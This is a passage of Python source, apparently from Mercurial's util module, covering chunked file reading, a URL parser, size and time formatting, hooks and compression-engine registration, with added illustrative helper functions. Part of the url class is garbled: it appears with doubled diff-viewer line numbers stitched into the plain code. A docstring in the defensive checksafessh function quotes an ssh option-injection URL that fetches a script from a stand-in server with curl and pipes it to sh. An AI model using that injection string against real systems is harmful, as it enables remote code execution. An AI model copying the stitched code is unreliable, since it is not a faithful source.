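    buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
    while True:
        frame = buf.read(4)
        if not frame:
            break
        yield frame  # yields b'abcd', then b'efg'
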
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, size (default
    131072) bytes at a time, up to an optional limit (default is to read all
    data). Chunks may be less than size bytes if the chunk is the last chunk
    in the file, or the file is a socket or some other type of file that
    sometimes reads less data than is requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

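# Illustrative sketch (not part of the original module): copying at most the
# first megabyte of a file in bounded chunks, so memory use stays flat no
# matter how large the source is.
def _copyheadsketch(src, dst):
    ifp = posixfile(src, 'rb')
    ofp = posixfile(dst, 'wb')
    try:
        for chunk in filechunkiter(ifp, size=65536, limit=2**20):
            ofp.write(chunk)
    finally:
        ifp.close()
        ofp.close()
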
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

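# Illustrative sketch (not part of the original module): framing a
# length-prefixed payload; the 4-byte big-endian prefix is an assumption made
# up for this example, not a Mercurial wire format.
def _readframedsketch(fh):
    import struct
    size = struct.unpack('>I', fh.read(4))[0]
    return cappedreader(fh, size).read()  # never reads past the frame
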
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

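# Illustrative sketch (not part of the original module): the first row whose
# threshold (multiplier * divisor) the value reaches wins.
def _bytecountsketch():
    # -> ['0 bytes', '999 bytes', '1.00 MB', '100 MB'], assuming the
    # untranslated format strings above
    return [bytecount(n) for n in (0, 999, 1 << 20, 100 << 20)]
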
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can be either a CRLF (with repeated CRs
# removed) or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we work around the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can work around the EINTR issue for fp.__iter__, it is
    # slower: "for x in fp" is 4x faster than "for x in iter(fp.readline, '')"
    # in CPython 2, because CPython 2 maintains an internal readahead buffer
    # for fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

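# Illustrative sketch (not part of the original module): iterating a
# subprocess pipe line by line; on CPython 2 the non-regular file takes the
# EINTR-safe readline path, elsewhere iterfile is a no-op wrapper.
def _pipelinessketch(proc):
    for line in iterfile(proc.stdout):
        yield line.rstrip('\n')
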
def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows escaping the prefix by
    doubling it.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

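# Illustrative sketch (not part of the original module): expanding '%'-style
# placeholders from an invented mapping, in the module's bytes-first
# convention.
def _interpolatesketch():
    mapping = {b'H': b'hg', b'V': b'4.6'}
    return interpolate(b'%', mapping, b'run %H version %V')
    # -> b'run hg version 4.6'
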
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

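# Illustrative sketch (not part of the original module): numeric input passes
# straight through, while a service name is resolved via getservbyname(); the
# second result depends on the local services database.
def _getportsketch():
    return getport(8080), getport('http')  # -> (8080, 80) on typical systems
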
2545 class url(object):
2543 class url(object):
2546 r"""Reliable URL parser.
2544 r"""Reliable URL parser.
2547
2545
2548 This parses URLs and provides attributes for the following
2546 This parses URLs and provides attributes for the following
2549 components:
2547 components:
2550
2548
2551 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2549 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2552
2550
2553 Missing components are set to None. The only exception is
2551 Missing components are set to None. The only exception is
2554 fragment, which is set to '' if present but empty.
2552 fragment, which is set to '' if present but empty.
2555
2553
2556 If parsefragment is False, fragment is included in query. If
2554 If parsefragment is False, fragment is included in query. If
2557 parsequery is False, query is included in path. If both are
2555 parsequery is False, query is included in path. If both are
2558 False, both fragment and query are included in path.
2556 False, both fragment and query are included in path.
2559
2557
2560 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2558 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2561
2559
2562 Note that for backward compatibility reasons, bundle URLs do not
2560 Note that for backward compatibility reasons, bundle URLs do not
2563 take host names. That means 'bundle://../' has a path of '../'.
2561 take host names. That means 'bundle://../' has a path of '../'.
2564
2562
2565 Examples:
2563 Examples:
2566
2564
2567 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2565 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2568 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2566 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2569 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2567 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2570 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2568 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2571 >>> url(b'file:///home/joe/repo')
2569 >>> url(b'file:///home/joe/repo')
2572 <url scheme: 'file', path: '/home/joe/repo'>
2570 <url scheme: 'file', path: '/home/joe/repo'>
2573 >>> url(b'file:///c:/temp/foo/')
2571 >>> url(b'file:///c:/temp/foo/')
2574 <url scheme: 'file', path: 'c:/temp/foo/'>
2572 <url scheme: 'file', path: 'c:/temp/foo/'>
2575 >>> url(b'bundle:foo')
2573 >>> url(b'bundle:foo')
2576 <url scheme: 'bundle', path: 'foo'>
2574 <url scheme: 'bundle', path: 'foo'>
2577 >>> url(b'bundle://../foo')
2575 >>> url(b'bundle://../foo')
2578 <url scheme: 'bundle', path: '../foo'>
2576 <url scheme: 'bundle', path: '../foo'>
2579 >>> url(br'c:\foo\bar')
2577 >>> url(br'c:\foo\bar')
2580 <url path: 'c:\\foo\\bar'>
2578 <url path: 'c:\\foo\\bar'>
2581 >>> url(br'\\blah\blah\blah')
2579 >>> url(br'\\blah\blah\blah')
2582 <url path: '\\\\blah\\blah\\blah'>
2580 <url path: '\\\\blah\\blah\\blah'>
2583 >>> url(br'\\blah\blah\blah#baz')
2581 >>> url(br'\\blah\blah\blah#baz')
2584 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2582 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2585 >>> url(br'file:///C:\users\me')
2583 >>> url(br'file:///C:\users\me')
2586 <url scheme: 'file', path: 'C:\\users\\me'>
2584 <url scheme: 'file', path: 'C:\\users\\me'>
2587
2585
2588 Authentication credentials:
2586 Authentication credentials:
2589
2587
2590 >>> url(b'ssh://joe:xyz@x/repo')
2588 >>> url(b'ssh://joe:xyz@x/repo')
2591 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2589 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2592 >>> url(b'ssh://joe@x/repo')
2590 >>> url(b'ssh://joe@x/repo')
2593 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2591 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2594
2592
2595 Query strings and fragments:
2593 Query strings and fragments:
2596
2594
2597 >>> url(b'http://host/a?b#c')
2595 >>> url(b'http://host/a?b#c')
2598 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2596 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2599 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2597 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2600 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2598 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2601
2599
2602 Empty path:
2600 Empty path:
2603
2601
2604 >>> url(b'')
2602 >>> url(b'')
2605 <url path: ''>
2603 <url path: ''>
2606 >>> url(b'#a')
2604 >>> url(b'#a')
2607 <url path: '', fragment: 'a'>
2605 <url path: '', fragment: 'a'>
2608 >>> url(b'http://host/')
2606 >>> url(b'http://host/')
2609 <url scheme: 'http', host: 'host', path: ''>
2607 <url scheme: 'http', host: 'host', path: ''>
2610 >>> url(b'http://host/#a')
2608 >>> url(b'http://host/#a')
2611 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2609 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2612
2610
2613 Only scheme:
2611 Only scheme:
2614
2612
2615 >>> url(b'http:')
2613 >>> url(b'http:')
2616 <url scheme: 'http'>
2614 <url scheme: 'http'>
2617 """
2615 """
2618
2616
2619 _safechars = "!~*'()+"
2617 _safechars = "!~*'()+"
2620 _safepchars = "/!~*'()+:\\"
2618 _safepchars = "/!~*'()+:\\"
2621 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2619 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2622
2620
2623 def __init__(self, path, parsequery=True, parsefragment=True):
2621 def __init__(self, path, parsequery=True, parsefragment=True):
2624 # We slowly chomp away at path until we have only the path left
2622 # We slowly chomp away at path until we have only the path left
2625 self.scheme = self.user = self.passwd = self.host = None
2623 self.scheme = self.user = self.passwd = self.host = None
2626 self.port = self.path = self.query = self.fragment = None
2624 self.port = self.path = self.query = self.fragment = None
2627 self._localpath = True
2625 self._localpath = True
2628 self._hostport = ''
2626 self._hostport = ''
2629 self._origpath = path
2627 self._origpath = path
2630
2628
2631 if parsefragment and '#' in path:
2629 if parsefragment and '#' in path:
2632 path, self.fragment = path.split('#', 1)
2630 path, self.fragment = path.split('#', 1)
2633
2631
2634 # special case for Windows drive letters and UNC paths
2632 # special case for Windows drive letters and UNC paths
2635 if hasdriveletter(path) or path.startswith('\\\\'):
2633 if hasdriveletter(path) or path.startswith('\\\\'):
2636 self.path = path
2634 self.path = path
2637 return
2635 return
2638
2636
2639 # For compatibility reasons, we can't handle bundle paths as
2637 # For compatibility reasons, we can't handle bundle paths as
2640 # normal URLS
2638 # normal URLS
2641 if path.startswith('bundle:'):
2639 if path.startswith('bundle:'):
2642 self.scheme = 'bundle'
2640 self.scheme = 'bundle'
2643 path = path[7:]
2641 path = path[7:]
2644 if path.startswith('//'):
2642 if path.startswith('//'):
2645 path = path[2:]
2643 path = path[2:]
2646 self.path = path
2644 self.path = path
2647 return
2645 return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))
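
    # A hedged usage sketch for authinfo() (values are illustrative, derived
    # from the behavior above rather than verified doctest output):
    #
    #   u = url(b'http://joe:xyzzy@example.com/repo')
    #   s, auth = u.authinfo()
    #   s     -> 'http://example.com/repo'  (credentials stripped)
    #   auth  -> (None, ('http://example.com/repo', 'example.com'),
    #             'joe', 'xyzzy')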

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()
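
# Illustrative results for the two predicates above (hedged, not doctests):
#
#   hasscheme(b'http://host/repo')  -> True
#   hasscheme(b'/tmp/repo')         -> False
#   hasdriveletter(b'c:\\tmp')      -> True (truthy)
#   hasdriveletter(b'/tmp')         -> False (falsy)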

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))
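
# Illustrative calls (hedged), per the SEC note above:
#
#   checksafessh(b'ssh://-oProxyCommand=touch${IFS}owned/path')  # raises Abort
#   checksafessh(b'ssh://user@host/repo')                        # returns None
#
# Note that the unquote() above means percent-encoded variants such as
# b'ssh%3A//-oProxyCommand=...' are rejected as well.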

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)
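
def _democredentialscrubbing():
    # Hypothetical helper, not part of the original module: a minimal sketch
    # of the expected effect of hidepassword() and removeauth() on a
    # credentialed URL, assuming the url class behavior above.
    assert hidepassword(b'http://joe:xyzzy@host/repo') == \
        b'http://joe:***@host/repo'
    assert removeauth(b'http://joe:xyzzy@host/repo') == b'http://host/repo'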

timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
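
# Illustrative renderings from the table above (hedged; computed by hand from
# the unitcountfn() thresholds, not verified doctest output):
#
#   timecount(12.5)    -> '12.50 s'
#   timecount(0.0042)  -> '4.200 ms'
#   timecount(2.5e-07) -> '250.0 ns'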

_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results
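
# A hedged usage sketch (names are illustrative):
#
#   h = hooks()
#   h.add('b-source', lambda x: x + 1)
#   h.add('a-source', lambda x: x * 2)
#   h(3)  -> [6, 4]   # hooks run in lexicographic order of their sources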

def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()
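
# Typical development use (illustrative):
#
#   debugstacktrace('entering foo', skip=1, depth=5)
#
# writes "entering foo at:" to stderr, followed by up to five
# "<file>:<line> in <function>" frames, innermost last.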

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
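
# A hedged sketch of the multiset semantics (illustrative values):
#
#   d = dirs([b'a/b/c', b'a/b/d'])
#   b'a/b' in d        -> True  ('a/b' is referenced by both paths)
#   d.delpath(b'a/b/c')
#   b'a/b' in d        -> True  (still referenced by 'a/b/d')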

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)
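
# For example (per the generator above):
#
#   list(finddirs(b'a/b/c/d')) -> [b'a/b/c', b'a/b', b'a']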

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # An empty first element means no external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

